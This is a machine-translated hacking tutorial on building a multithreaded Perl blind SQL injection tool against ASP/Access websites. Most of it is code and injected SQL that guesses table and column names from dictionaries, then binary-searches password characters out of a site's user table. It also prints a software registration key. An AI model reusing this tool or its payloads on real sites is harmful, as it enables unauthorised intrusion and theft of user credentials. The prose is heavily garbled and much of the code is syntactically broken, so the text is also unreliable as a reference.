Speaking of the SQL injection machine, from the doll taro DVTXT.PL to the smell of the smell, the NBSI of the CSC, NB Alliance, everyone is used?
Open the ancestor DVTXT.PL, I don't know how much it has been changed, it is used to use a system with various SQL injection vulnerabilities, usually "black defense" article "** there is SQL injection vulnerability" article, last If you have to lift this Buddha, change a few fields, then, another ** killing tool is unearthed! For the smell of smell, I have used it to be reluctant. Although it adopts multi-threaded technology, it still makes up for the bad influence of the algorithm, and the crack is the dictionary, not only the speed is slow, but also limit it. The crack of Chinese double-byte characters, while NBSI, although the breaking algorithm has been improved, but I have forgot the multi-thread, and when I guess the table name, column name, share a big dictionary, white and white waste. The two things are spent together, but there is no original code (visual development tool, will only use VB below under the following ! I don't know if the boss has been developed in a language. Even if it is the same, even if it is VB, no one is willing to provide the original code, helpless ... I have to respond to the chairman call: I have a good job!
The program is just that the manual turns automatic, first come back to recall the process of manually injection the guess: 1. Find the injection point -> 2. Construct SQL query statement -> 3. Submit URL-> 4. Return information according to the browser Determine the correctness of the SQL query statement -> 5. Correct SQL Query Statement -> 6. Repeat 3.4.5 N times until the correct information of the database store is obtained.
Translated into programming language: 1. Enter the URL ($ URL) of SQL injection vulnerability -> 2. Extract the host ($ host), path ($ PATH), port ($ port) -> 3. Construct SQL query The statement is added to the URL ($ URL) -> 4. Use IO :: Socket to the Target Host Submit URL -> 5. Extract the character ($ INFO) when extracting query logic values (false), success Transfer to the suggestion of the next target value, the failure continues to repeat 3.4.5.
Guess the global flow chart is as follows:
User Information Table -> User Name Field -> Password Field -> Id Field -> Smaller User ID -> User Name Length -> Password Length -> User Name -> Password
It is a bit simple, because these things are popular, more detailed, you can refer to the "hacking line" No. 5 SQL injection topic, theoretical finish, everyone is not self-contained, the heart is hot, the knife is Hyun ...
Let'go!
One. Extract the host in the URL ($ Host), Path ($ PATH), Port ($ Port)
I also remember the DVTXT.PL of the doll, as well as the cumbersome usage: dvtxt.pl
In use, copying is extremely inconvenient. In fact, using Perl's powerful regular expression, you can solve it, first observe a few URL: http://www.hemon.tk/show.asp? Id = 957,
http://www.hemon.tk:1314/show.asp?id=957,
http://www.hemon.tk/article/show.asp?id=957. Through the phenomenon, the nature, the law will come out :(
http: //) Host (: Port) / Path. () 0 or 1 time in the characters.
Regular expressions are also:
code:
IF ($ URL = ~ /( )? (. ?) //(. )/)
{
$ Host = $ 2;
$ PATH = '/'. $ 3;
IF ($ host = ~ /((. ): (. )/)
{
$ Host = $ 1;
$ port = $ 2;
}
}
In the "$ URL = ~ /(() (. ?) // (. )/, first say that? , Match 0 or 1 this character, so when you enter a link "
http: // "There isomable; match the host ($ Host) is (. ?), why not (. ), because Perl default greed mode, will match the back of the characters as much as possible (in Here is '/'), so if it is not limited in time, the URL of this:
http://www.hemon.tk/article/show.asp?id=957, $ Host will match www.hemon.tk/article, not www.hemon.tk we want.
two. IO :: Socket Submit Function
After the efforts of just now, it should be the time to return, and quickly use the host ($ host), path ($ PATH), port ($ port), write this submission function:
code:
Sub connect
{
$ REQ = "get $ Path $ Path1 HTTP / 1.0 / N".
"Host: $ Host / N".
"Referr: $ Host / N".
"Cookie: / n / n";
MY $ Connection = IO :: Socket :: inet-> new (proto => "tcp",
Peeraddr => $ Host,
Peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n";
Print $ Connection $ Req;
My @res = <$ connection>;
CLOSE $ Connection;
Return @res;
}
The Connect subroutine will return information in array @res;
three. Guess user information table
Use SQL query statement: 0 <> (Select Count (*) from Table)
The real crack begins, there is no shortcut to go, read the table name stored in the dictionary, then one attempt, once successfully match the correct information, immediately exit the While loop; there are two types, one is an array, one is an array, The second is the text dictionary, and the Perl script we will compile to an Exe executable, in order to make future modifications to add a new table name, I use the text dictionary file: program code:
Open (TabInput, "Table.txt") or Die "can't open file! / n";
While (chomp (MY $ INPUT =
{
MY $ SQL = "0 <> (select% 20count (*)% 20FROM% 20 $ INPUT";
$ PATH1 = "% 20And% 20 $ SQL";
& URL;
@res = & connect;
IF ("@res" = ~ / $ info /)
{
$ TABLE_USER = $ INPUT;
Print "The Table of UserInfo IS: $ TABLE / N";
Last;
}
}
Close (TabInput);
four. Guess the word name
Use SQL query statement: exists (SELECT col_name from table)
This step is the same as the specification of the name, once we successfully get the table name, we will divide the three roads, go straight to the user name ($ FIELD_USER), password column ($ field_pass), ID column ($ field_id), since it is division attack, If you have to use multithreaded, multi-thread in Perl, huh, you haven't tried it yet?
In order to implement the first preparation of multi-threaded work, write a guessing sub-routine (function), we still use the text dictionary file, here, the file name is incorporated in the unique parameter:
code:
Sub Field_input
{
MY $ field;
Open (Fieinput, "$ _ [0]") OR DIE "can't open file! / n";
While (chomp (my $ INPUT =
{
MY $ SQL = "EXISTS% 20 (SELECT% 20 $ INPUT% 20FROM% 20 $ TABLE_USER)"
$ PATH1 = "% 20And% 20 $ SQL";
My @res = & connect;
IF ("@res" = ~ / $ info /)
{
$ FIELD = $ INPUT;
Print "/ T - $ FIELD - ";
Last;
}
}
Close (Fieinput);
Return $ FIELD;
}
Fives. Perl multi-threaded speed
Then, then of course is a multi-thread technology to learn Perl! ! ! Maybe you start to be bold, think that there is a great, huh, huh, 80/20 Swiss army knife rules are then then useful, we only need to learn two functions, you can end our quick class:
$ thread = threads-> Create (Function, List)
With variable name $ thread, create a thread of a subroutine / function (Function), List is the parameters of the subroutine / function, and create replace it is NEW. $ thread-> join
Waiting for the thread to run. Once the end is run, Join () will return the value of the subroutine / function (function).
That's all!
It's that simple? Is it? Just do two kitches to do our revolution !!!
See ActicePerl's help documentation for details: Perl / html / lib / threads.html.
5, 4, 3, 2, 1, ignition! ! !
code:
$ thread1 = threads-> Create ("Field_Input", "Field_Username.txt");
$ thread2 = threads-> Create ("Field_Input", "Field_Password.txt");
$ thread3 = threads-> Create ("Field_Input", "Field_Id.txt");
Recycling return warehouse:
code:
$ FIELD_USERNAME = $ thread1-> join ();
$ FIELD_PASSWORD = $ thread2-> join ();
$ FIELD_ID = $ thread3-> join ();
At the same time, three threads, then join, how perfectly landed, 10 points! ! !
Fives. Guess the skills
Even if you have a few horses, the horse has not yet running the car wheel. Let's study the skills of the suspected, go back and see waiting for our task: Minimum User ID -> User Name Length -> Password Length -> User Name -> Password.
The ID value is a natural value. The length is Length ($ field) is a value, a username and password ASCII code or a value, both play a guess number JavaScript game? A number of items within 100, why only give you 7 opportunities to guess? Because 2 ^ 7 = 128, in other words, a number of 128, you only need to guess 7 times, then there are thousands of tens of thousands of dollars in Li Wei show, and guess a few times? 2 ^ 13 = 8192, 2 ^ 14 = 16384, do you still have prizes? !
In order to let everyone see a little, guess the number of 8, such as 5, the steps are as follows:
? <4 n
? <6 y 4 2
? <5 n 6 - 1
? = 5
It has been used three times, first starting from the median (4), half of each of the plus / reduction value (2, 1), these 2 ^ n are fixed, in order to avoid the CPU repetition calculation, Guess the scope of decline, the corresponding quote, I have prepared four:
code:
@ DIC1 = (128, 64, 32, 16, 8, 4, 2, 1); # minimum user ID
@ DIC2 = (16, 8, 4, 2, 1); # username, password length
@ DIC3 = (64, 32, 16, 8, 4, 2, 1); # 英文 符 @ DIC4 = (16384, 8192, 4096, 2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4, 2,) 1); # Chinese characters
The algorithm function is as follows:
SUB CRACK
{
MY (@dic) = @_;
MY $ SQL = POP (@dic);
MY $ i = 0;
MY $ OP = 1;
MY $ CRACK;
Foreach MY $ Pass (@dic)
{
PRINT ">";
$ i ;
$ CRACK = $ OP * $ Pass;
$ PATH1 = "% 20And% 20 $ CRACK <($ SQL)";
My @res = & connect;
IF ("@res" = ~ / $ info /)
{
$ OP = 1;
IF ($ i == @ DIC)
{
$ CRACK ;
}
}
Else
{
$ OP = -1;
}
}
Return $ CRACK;
}
$ SQL = "SELECT% 20min ($ FIELD_ID)% 20FROM% 20 $ TABLE_USER";
$ ID = & CRACK (@ DIC1, "$ SQL");
Pass the SQL injection statement and the corresponding array dictionary, CRACK! ! !
When the parameter is an array, the subroutine only assigns it to an array variable, my (@dic) rather than my (@ DIC, $ SQL) = @ _; latter, $ SQL will inevitably empty! Simple variables and array variables can be passed at the same time, $ SQL is here the last element of @dic. POP (@dic) Remove the last element of the list ($ SQL), and use it as a return value, the remaining @Dic is a pure number.
Let us take the gas, take the user name and password length, and don't forget to use multiple threads:
code:
$ SQL = "SELECT% 20LEN ($ FIELD_USERNAME)% 20FROM% 20 $ TABLE_USER% 20where% 20field_ID = $ ID";
My $ thread4 = threads-> CREATE ("CRACK", @ DIC2, $ SQL);
$ SQL = "SELECT% 20LEN ($ FIELD_PASSWORD)% 20FROM% 20 $ TABLE_USER% 20where% 20 $ FIELD_ID = $ ID";
My $ thread5 = threads-> CREATE ("CRACK", @ DIC2, $ SQL);
$ userlen = $ thread4-> join ();
$ Passlen = $ thread5-> join ();
Six. The last battle - attack the value of the field
Use SQL query statement: SELECT ABS ($ FieuserName, $ locat, 1))
The speculation in MS-SQL is not discussed here. It can be said that MS-SQL is not guessed, and you only need to construct the conditions well enough, you can directly display the data directly to the other party when the error is reported.
ACCESS speculation: first to determine if the ASCII code value is greater than zero, it is larger, use @ DIC3 set to the CRACK function, less than @ DIC4! After the function returns a value, there are two ways: use nchar ($ ASC) or PACK ('c *', $ ASC); and for Chinese characters: Open the calculator, select scientific, convert into hex The order word is ****, with UltraEdit editing as * word, haha ... then don't call! First, use Sprintf ("% x", $ ASC) to complete the calculator's conversion hexadecimal work, (Don't forget to use the regular expression to put forward the last four, otherwise, the word is going to take two spaces) Then complete the UltraEdit packaging job with PACK ("H *", $ STR):
code:
SUB ASC
{
MY $ ASC = $ _ [0];
MY $ STR;
IF ($ ASC <256)
{
$ Str = Pack ('C *', $ ASC);
}
Else
{
$ asc * = - 1;
$ STR = Sprintf ("% x", $ ASC);
IF ($ STR = ~ / (. {4}) $ / i)
{
$ Str = $ 1;
}
$ STR = Pack ("h *", $ STR);
}
Return $ STR;
}
Everything is ready, only the Dongfeng, this only gues password value as an example, one password starts a CRACK sub-thread:
code:
For (my $ locat = 1; $ locat <= $ passlen; $ locat )
{
$ SQL = "SELECT% 20ASC (MID ($ Field_Password, $ locat, 1))% 20FROM% 20 $ TABLE_USER% 20where% 20 $ field_id = $ ID";
$ PATH1 = "% 20AND% 200> ($ SQL)";
My @res = & connect;
IF ("@res" = ~ / $ info /)
{
$ SQL = "SELECT% 20Abs (ASC ($ Field_Password, $ locat, 1)))% 20From% 20 $ TABLE_USER% 20where% 20 $ FIELD_ID = $ ID";
$ Password [$ locat] = threads-> Create ("CRACK", @ DIC4, $ SQL);
}
Else
{
$ Password [$ locat] = threads-> Create ("CRACK", @ DIC3, $ SQL);
}
}
Slowly waiting for these children to have a jacket returning to the hometown:
code:
For (my $ locat = 1; $ locat <= $ passlen; $ locat )
{
$ Password [$ locat] = $ password [$ locat] -> JOIN ();
}
Other display details, I don't want to say more, and rushed to compile EXE. Go!
six. Compiling Perl for EXE
Home from Perl2exe
Http://www.indigostar.com/perl2exe.htm, Down's latest version of Perl2exe for Win32, so far is 8.40, direct decompression, CMD command line enters the decompressed directory, in order to avoid browsing annoying ads, let us first Get registration this software: program code:
D: / Hemon / Software> Perl2exe -Register
Perl2exe v8.40 Copyright (C) 1997-2004 Indigostar Software
Please enter your registration key, or press enter to cancel
Enter my registration code:
Hemon: Hemon: 20040709, 36713
After the registration is successful:
Registered
At the same time, the program directory generates a registry file called Perl2exe.Key, can be moved!
Compile PL:
code:
D: / Hemon / Software> Perl2exe Si.pl
Perl2exe v8.40 Copyright (C) 1997-2004 Indigostar Software
Registered to Hemon: Hemon: 20040709, ENT VERSION
Converting 'Si.pl' to Si.exe
A multi-threaded, supporting the Chinese cracked Perl version of the injector is born! ! !
About can increase the speed, that is, it can save half of the time, and there is still a big exit with my expectations. The unfairness is that there is really a "desire speed is not reached", I provide two versions (thr.pl/sig.pl), for websites with slow network speed, huh, ... I know, I don't tell us! It is best to change the single thread, and the stability is better.
However, the code is in the hand, I am not afraid that you will change, enhance the stability, plus a few functions, let it support PHP mysql, ASP MSSQL what ...
One sentence: the power of the network! Support open original code!
